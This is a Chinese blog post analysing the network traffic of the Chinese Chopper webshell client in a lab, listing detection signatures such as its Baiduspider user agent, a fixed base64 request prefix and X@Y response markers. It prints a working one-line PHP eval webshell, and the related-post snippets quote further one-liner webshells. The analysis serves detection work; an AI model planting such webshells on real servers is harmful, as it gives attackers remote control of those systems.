菜刀webshell特征分析

已于 2022-08-01 14:03:54 修改
阅读量1.4k 收藏 5
点赞数 1
分类专栏: 安全笔记 web笔记 文章标签: 网络 安全 web安全
于 2022-08-01 12:49:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52444045/article/details/126096719
版权

文章目录

前言

Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。

hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。

有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。

环境

用的虚拟机的phpstudy搭建的网站,并在虚拟机里面使用wireshark进行捕捉流量包。

物理机使用的是中国菜刀:https://github.com/raddyfiy/caidao-official-version

上传webshell并连接

一句话木马:

<?php eval($_POST[caidao]);?>

通过某种途径,把一句话木马上传到了网站的根域名下

在这里插入图片描述

然后在菜刀工具里面,添加一个新的shell连接,密码caidao
在这里插入图片描述
同时也开启wireshark进行抓包,为了更直观的分析,对ip进行了过滤,只看与物理机(192.168.80.1) 的通信
在这里插入图片描述

成功连接到webshell
在这里插入图片描述
翻看一下目录
在这里插入图片描述
执行系统命令
在这里插入图片描述

上传了一个测试文本
在这里插入图片描述

分析流量

我已经将捕获到的数据包上传至csdn,详细见:https://download.csdn.net/download/weixin_52444045/86269653

特征一:

所有的请求都是一致的,方式为POST,路径为webshell的url地址。

我的是POST /123.php
在这里插入图片描述

特征二:

菜刀工具发起的请求头里面,默认的UA为百度的爬虫 Baiduspider

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

在这里插入图片描述

不过这个东西是可以在caidao.conf里面进行修改的,还是小心起见
在这里插入图片描述

特征三

这个是最主要的一个特征,如果请求包中包含下面信息,那么99%就是菜刀连接到shell了

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

在这里插入图片描述
在所有的请求包中,请求体的内容中,key的值就是连接菜刀webshell的密码,后面的值是用base64进行了加密,下面拿出几个值来进行分析下
在这里插入图片描述
圈出的这个可以用base64进行解码解出来的,每个请求中的前缀都是一样的,一定要注意这个前缀!!

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

解码后是下面:

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");

在这里插入图片描述

特征四

每个返回包中,结果是用X@Y进行包含的
在这里插入图片描述
在这里插入图片描述
通过返回包可以直观的判断出是做了什么操作。

个人理解

图形操作去执行一些操作的原理是,利用php、asp、jsp的函数去完成操作。

后来找到在caidao.conf文件里面,有写每个操作的函数
在这里插入图片描述

下面对抓取到的一个流量包和代码进行对比

在这里插入图片描述

可以看到这个是上传文件的操作

可以看出规律:
执行对应操作的代码为

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");
+
对应操作的函数代码
+
;echo("X@Y");die();

然后通过base64编码,传入请求体中。所以前缀是固定的,详细见特征三。

通过分析捕获到的流量包,每一个请求包中都可以解密并找到是什么操作的

sec0nd_
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网安工具系列:WebShell --中国菜刀,管站之刀
weixin_54626591的博客
03-29 484
WebShell --中国菜刀,管站之刀
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
全面分析中国菜刀及隐藏后门
qq_29566629的博客
02-26 1077
使用PEiD查看菜刀工具有无加壳: winhex 显示的ASCII码转化成的字符串和linux下strings命令查看出来的一样: 菜刀的流量都是明文传输的 存在待后门的菜刀: 比如这个菜刀的流量,经过URL解码和base64解码以后,还有一串base64加密的流量,解密以后如图: 很明显在攻击的时候,把靶机的地址、请求URL、口令都发送给了划线的地址,这就是这个菜刀工具开发者留的后门,可以轻松的收集到使用这个工具的人找到的shell。 ...
常见的webshell工具的流量特征
m0_66458291的博客
01-19 2541
常见的webshell工具流量的简单分析(菜刀、蚁剑、冰蝎、哥斯拉)
常见webshell工具特征分析
最新发布
白帽黑客八哥的博客
05-29 1447
在工作中经常会遇到各种websehll,黑客通常要通过各种方式获取 webshell,从而获得企业网站的控制权,识别出webshell文件或通信流量可以有效地阻止黑客进一步的攻击行为,下面以常见的四款webshell进行分析,对工具连接流量有个基本认识。Webshell简介webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具特征分析
qq_53058639的博客
03-17 1092
在测试过程中,我们经常会运到各种webshell管理工具,这里我介绍几种常见的webshell工具给大家。webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。?
web安全第四天:webshell原理与菜刀使用
cc777777777的博客
02-26 1763
webshell原理与菜刀使用
webshell管理工具-菜刀的管理操作
黄乔国PHP
03-09 1775
Webshell工具是一种用于测试和评估Web服务器安全性的软件工具。这些工具可以利用Web应用程序中的漏洞或者弱密码等安全问题,将Webshell植入到目标服务器上,从而获取对服务器的控制权。支持多种Web应用程序漏洞利用:例如SQL注入、文件包含、文件上传、命令注入等。支持多种Webshell类型:例如PHP、ASP、JSP等。提供一系列操作功能:例如上传文件、下载文件、执行命令、创建用户、修改系统配置等。
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
WebShell文件上传漏洞分析溯源(第3题)
02-22
WebShell 文件上传漏洞分析溯源 本文将对 WebShell 文件上传漏洞进行深入分析,探讨其原理、危害性以及防御方法。同时,通过实践演示,展示如何绕过页面对可执行文件上传的限制,利用 WebShell 读取服务器上的源...
WebShell管理工具
07-12
WebShell管理工具 一款不错的WEBSHELL管理及后门是否存在检测工具
教你拿webshell
10-23
4. **Webshell分类**:常见的Webshell中国菜刀、小马、大马等,它们有不同的功能和复杂程度。初级的Webshell可能只有简单的命令执行功能,而高级的Webshell则可以提供图形界面,甚至支持多种远程操作和管理工具。 ...
攻击工具分析:哥斯拉(Godzilla)1
08-03
哥斯拉是由Java语言编写,继承了诸如菜刀、蚁剑、冰蝎等前辈的特性,并在其基础上进行了增强,提供了更多的功能和优势。 首先,哥斯拉的一大亮点是其全面的shell支持。它能够绕过市面上大部分静态查杀系统,这意味...
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 5323
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
kali渗透测试-WebShell中国菜刀WeBaCoo、Weevely)
网络安全领域优质创作者
11-21 2127
本质 : 上传一句话木马 <?php echo shell_exec($_GET[‘cmd‘]);?> windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> p...
初始webshell+中国菜刀的使用
m0_48222671的博客
04-18 5290
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
菜刀、蚁剑、冰蝎、哥斯拉特征
single_g_l的博客
08-04 2538
3,请求体中传递的payload为base64编码,并且存在固定的QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J。2,请求体中存在eavl,base64等特征字符。1,请求包中:ua头为百度,火狐。...
webshell流量特征分析
04-08
通过以上特征分析,可以帮助我们检测和识别webshell流量。然而,需要注意的是,webshell的流量特征是不断变化的,攻击者会不断改变webshell的代码和流量特征来规避检测。因此,及时更新和使用最新的webshell检测规则...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值